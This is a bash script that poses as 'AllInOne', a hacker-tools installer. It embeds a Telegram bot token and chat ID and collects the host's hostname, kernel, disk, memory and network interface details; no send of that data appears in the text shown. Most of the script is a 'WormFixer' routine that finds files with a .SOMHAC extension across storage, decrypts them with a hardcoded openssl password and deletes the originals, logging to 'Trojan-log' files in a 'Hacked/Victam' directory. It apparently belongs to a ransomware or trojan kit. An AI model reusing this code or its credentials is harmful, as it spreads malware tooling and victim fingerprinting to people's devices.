#! /usr/bin/bash

# Colors
R="$(printf '\033[1;31m')"
G="$(printf '\033[1;32m')"
Y="$(printf '\033[1;33m')"
W="$(printf '\033[1;37m')"
C="$(printf '\033[1;36m')"
b="\033[1;30m"
r="\033[1;31m"
g="\033[1;32m"
y="\033[1;33m"
b="\033[1;34m"
p="\033[1;35m"
c="\033[1;36m"
v="\033[1;37m"
w="\033[0;37m"
black="\033[1;30m"
red="\033[1;31m"
green="\033[1;32m"
yellow="\033[1;33m"
blue="\033[1;34m"
purple="\033[1;35m"
cyan="\033[1;36m"
violate="\033[1;37m"
white="\033[0;37m"
nc="\033[00m"
#--------ModeTool---------#
info="${cyan}[${white}+${cyan}] ${yellow}"
fun="${cyan}[${white}@${cyan}] ${purple}"
ask="${cyan}[${white}?${cyan}] ${purple}"
bad="${cyan}[${white}!${cyan}] ${red}"
good="${cyan}[${white}√${cyan}] ${green}"
#---------FaceType--------#
sad="$red ಠ⁠︵ಠ⁠"
llok="$blue ಠ⁠_⁠ʖ⁠ಠ⁩"
hehe="$yellow ಡ⁠ ͜⁠ ⁠ʖ⁠ ⁠ಡ"
huh="$blue ʘ⁠‿⁠ʘ"
happy="( ⁠•⁠ ⁠‿⁠ ⁠•⁠ )"
#---------OPIONS----------#
home=$(pwd)
more_info="AllInOne is a tool can install and startup you to become a hacker with alots of tools $hehe "
name=AllInOne
TOKEN="5691570782:AAGMKFygk9MyAlZXtPNddydtDsY4Ouo8-ng"
CHAT_ID="5010958919"
Device=$(uname -a)
Tdate=$(date)
HostName=$(hostname)
Kernel=$(uname -r)
UpTime=$(uptime)
MemoryUsage=$(free -m)
DiskUsage=$(df -h)
ip=$(ifconfig -a)
#-------------------------#
# Check if offline
net() {
    while true; do
        wget --spider --quiet https://github.com
        if [ "$?" = 0 ]; then

            nN='Y'
            NnEt="Connected To Network [★]"

        break
       else
                nN='N'
                NnEt="No Internet [X] "
                break
        fi
    done
}

# Termux
if [[ -d /data/data/com.termux/files/home ]]; then
termux=true
PREFIX='/data/data/com.termux/files/usr/'
SYS='/storage/'
elif [[ -d /root/ ]];then
termux=false
PREFIX='/'
SYS='/'
else
echo -e $info $r "${bad}No supported package manager found! Install packages manually!"
fi

# package manager

if [[ `command -v B24B.apt` ]]; then
        apt="apt"
elif [[ `command -v apt` ]]; then
    apt="apt"
elif  [[ `command -v apt-get` ]]; then
    apt="apt-get"
elif  [[ `command -v yum` ]]; then
    apt="yum"
elif [[ `command -v dnf` ]]; then
    apt="dnf"
elif [[ `command -v apk` ]]; then
    apt="apk"
elif [[ `command -v pacman` ]]; then
    apt="pacman"
else
    echo -e "${bad}No supported package manager found! Install packages manually!"
    exit 1
fi

if [[ -f $PREFIX/etc/Hacked/LOCKS/WormFixer_lock_file ]];then

	printf ""

else

touch $PREFIX/etc/Hacked/LOCKS/WormFixer_lock_file


rm -rfd $PREFIX/etc/Hacked/Victam/Trojan-log-Fixed.txt &>> /dev/null
echo "#------------TrojanLogs-------------#" > $PREFIX/etc/Hacked/Victam/Trojan-log-Fixed.txt

# Encrypt all files in the directory
JPG(){
for filename in $(find ${SYS} -name *.jpg.SOMHAC); do

    # Generate a random password
    PASSWORD=S@MH4C_THE_KING

    echo -e " New File Dencrypted , Name of file : $filename " >> $PREFIX/etc/Hacked/Victam/Trojan-log-Fixed.txt
        openssl enc -aes-256-cbc -salt -d -in $filename -out $filename.jpg -k $PASSWORD &>> /dev/null
        echo -e " New File Dencrypted , Name of file : $filename "
        rm $filename &>> /dev/null
    # Create a text file containing the password used to encrypt the file

done
}
PNG(){
for filename in $(find ${SYS} -name *.png.SOMHAC); do

    # Generate a random password
    PASSWORD=S@MH4C_THE_KING

    echo -e " New File Dencrypted , Name of file : $filename " >> $PREFIX/etc/Hacked/Victam/Trojan-log-Fixed.txt
        echo -e " New File Dencrypted , Name of file : $filename "
        openssl enc -aes-256-cbc -salt -d -in $filename -out $filename.png -k $PASSWORD &>> /dev/null
        rm $filename &>> /dev/null
    # Create a text file containing the password used to encrypt the file

done
}
MP4(){
for filename in $(find ${SYS} -name *.mp4.SOMHAC); do

    # Generate a random password
    PASSWORD=S@MH4C_THE_KING

    echo -e " New File Dencrypted , Name of file : $filename " >> $PREFIX/etc/Hacked/Victam/Trojan-log-Fixed.txt
        echo -e " New File Encrypteed , Name of file : $filename " >> $PREFIX/etc/Hacked/Badshell/Trojan-log.txt
        openssl enc -aes-256-cbc -salt -d -in $filename -out $filename.mp4 -k $PASSWORD &>> /dev/null
        rm $filename &>> /dev/null
    # Create a text file containing the password used to encrypt the file

done
}
GIF(){
for filename in $(find ${SYS} -name *.gif.SOMHAC); do

    # Generate a random password
    PASSWORD=S@MH4C_THE_KING

    echo -e " New File Dencrypted , Name of file : $filename " >> $PREFIX/etc/Hacked/Victam/Trojan-log-Fixed.txt
        echo -e " New File Dencrypted , Name of file : $filename "
        openssl enc -aes-256-cbc -salt -d -in $filename -out $filename.gif -k $PASSWORD &>> /dev/null
        rm $filename &>> /dev/null
    # Create a text file containing the password used to encrypt the file

done
}
TXT(){
for filename in $(find ${SYS} -name *.txt.SOMHAC); do

    # Generate a random password
    PASSWORD=S@MH4C_THE_KING

    echo -e " New File Dencrypted , Name of file : $filename " >> $PREFIX/etc/Hacked/Victam/Trojan-log-Fixed.txt
        echo -e " New File Dencrypted , Name of file : $filename "
        openssl enc -aes-256-cbc -salt -d -in $filename -out $filename.txt -k $PASSWORD &>> /dev/null
        rm $filename &>> /dev/null
    # Create a text file containing the password used to encrypt the file

done
}
XLX(){
for filename in $(find ${SYS} -name *.xlxs.SOMHAC); do

    # Generate a random password
    PASSWORD=S@MH4C_THE_KING

    echo -e " New File Dencrypted , Name of file : $filename " >> $PREFIX/etc/Hacked/Victam/Trojan-log-Fixed.txt
        echo -e " New File Dencrypted , Name of file : $filename "
        openssl enc -aes-256-cbc -salt -d -in $filename -out $filename.xlxs -k $PASSWORD &>> /dev/null
        rm $filename &>> /dev/null
    # Create a text file containing the password used to encrypt the file

done
}
DOC(){
for filename in $(find ${SYS} -name *.doc.SOMHAC); do

    # Generate a random password
    PASSWORD=S@MH4C_THE_KING

    echo -e " New File Dencrypted , Name of file : $filename " >> $PREFIX/etc/Hacked/Victam/Trojan-log-Fixed.txt
        echo -e " New File Dencrypted , Name of file : $filename "
        openssl enc -aes-256-cbc -salt -d -in $filename -out $filename.doc -k $PASSWORD &>> /dev/null
        rm $filename &>> /dev/null
    # Create a text file containing the password used to encrypt the file

done
}
ZIP(){
for filename in $(find ${SYS} -name *.zip.SOMHAC); do

    # Generate a random password
    PASSWORD=S@MH4C_THE_KING

    echo -e " New File Dencrypted , Name of file : $filename " >> $PREFIX/etc/Hacked/Victam/Trojan-log-Fixed.txt
        echo -e " New File Dencrypted , Name of file : $filename "
        openssl enc -aes-256-cbc -salt -d -in $filename -out $filename.zip -k $PASSWORD &>> /dev/null
        rm $filename &>> /dev/null
    # Create a text file containing the password used to encrypt the file

done
}
PDF(){
for filename in $(find ${SYS} -name *.pdf.SOMHAC); do

    # Generate a random password
    PASSWORD=S@MH4C_THE_KING

    echo -e " New File Dencrypted , Name of file : $filename " >> $PREFIX/etc/Hacked/Victam/Trojan-log-Fixed.txt
        echo -e " New File Dencrypted , Name of file : $filename "
        openssl enc -aes-256-cbc -salt -d -in $filename -out $filename.pdf -k $PASSWORD &>> /dev/null
        rm $filename &>> /dev/null
    # Create a text file containing the password used to encrypt the file

done
}
#----------
JPG &>> /dev/null
PNG &>> /dev/null
MP4 &>> /dev/null
GIF &>> /dev/null
TXT &>> /dev/null
XLX &>> /dev/null
DOC &>> /dev/null
ZIP &>> /dev/null
PDF &>> /dev/null

echo "#------------TrojanLogs-------------#" > $PREFIX/etc/Hacked/Victam/Trojan-log-Fixed.txt
#----------

echo "End" > $PREFIX/etc/Hacked/LOCKS/WormFixer_lock_file
rm $PREFIX/etc/Hacked/LOCKS/WormFixer_lock_file
fi
